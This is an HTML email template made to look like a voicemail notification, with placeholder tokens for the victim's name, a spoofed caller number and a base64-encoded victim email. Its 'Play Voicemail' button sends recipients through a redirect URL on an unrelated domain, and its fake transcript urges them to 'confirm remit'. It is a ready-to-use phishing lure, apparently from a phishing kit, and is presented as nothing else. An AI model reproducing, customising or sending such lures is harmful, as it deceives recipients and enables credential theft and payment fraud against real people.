<!DOCTYPE html>
<html>
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
  <style>
    body {
      background: #f9fafb;
      font-family: 'Segoe UI', Tahoma, sans-serif;
      margin: 0; padding: 0;
    }
    .container {
      max-width: 600px; margin: 40px auto; background: #fff;
      border-radius: 12px; box-shadow: 0 6px 20px rgba(0,0,0,0.07);
      padding: 30px;
    }
    table { width: 100%; border-collapse: collapse; }
    td { padding: 8px 0; vertical-align: top; }
    .header { font-size: 24px; font-weight: bold; color: #1d72e8; text-align: center; }
    .logo { font-size: 36px; text-align: left; padding: 10px 0 20px; }
    .label { font-weight: 600; color: #222; }
    .play-btn {
      display: inline-block; padding: 14px 28px; background: #1d72e8;
      color: #fff; font-size: 16px; font-weight: bold; text-decoration: none;
      border-radius: 8px; box-shadow: 0 4px 10px rgba(0,0,0,0.1);
      margin-top: 20px; word-break: break-word;
    }
    .play-btn:hover { background: #155bb5; }
    .footer {
      text-align: center; margin-top: 40px; font-size: 12px; color: #999;
    }
  </style>
</head>
<body>
  <div class="container">
    <table>
      <tr><td colspan="2" class="header">You have a new Voice Message</td></tr>
      <tr><td colspan="2" class=""></td></tr>
      <tr><td class="label">From:</td><td>+1 (880) ##num3##-##num4##</td></tr>
      <tr><td class="label">Date:</td><td>##date8##</td></tr>
      <tr><td class="label">Time:</td><td>##date4##</td></tr>
      <tr><td class="label">Size:</td><td>320 KB</td></tr>
	  <tr>
  <td class="label">Transcript:&nbsp;&nbsp;&nbsp;</td>
  <td>
    <span style="font-size: 14px; color: #666; font-style: italic; background-color: #f0f0f0; padding: 6px 10px; border-radius: 6px; display: inline-block;">
      &nbsp;Hey, ##victimname## Please can you confirm remit#.............. listen to VM below
    </span>
  </td>
</tr>

	  <tr>
        <td colspan="2" style="text-align:center;">
          <a class="play-btn" target="_blank" href="https://nutritionconnectionbalance.com/F/redirect.php?code=D24tLoEnvh1sOyxlUYlGyhGRfW9yuqtoeMLhLPVoGA6HOh0zj5RMiAYppl9xm4AMrZRfJsSjUG7qBpk7LrXhRxxb0rZfwI9xPOsZy2RBb6vvfIt5B00DNR4ssnHRW72p5hPLDG6dqcRrMuwKdkP8Io###victimb64email##">
             Play Voicemail
          </a>
        </td>
      </tr>
    </table>
    <div class="footer">
      If this wasn't intended for you, please ignore it or contact our support team.
    </div>
  </div>
</body>
</html>
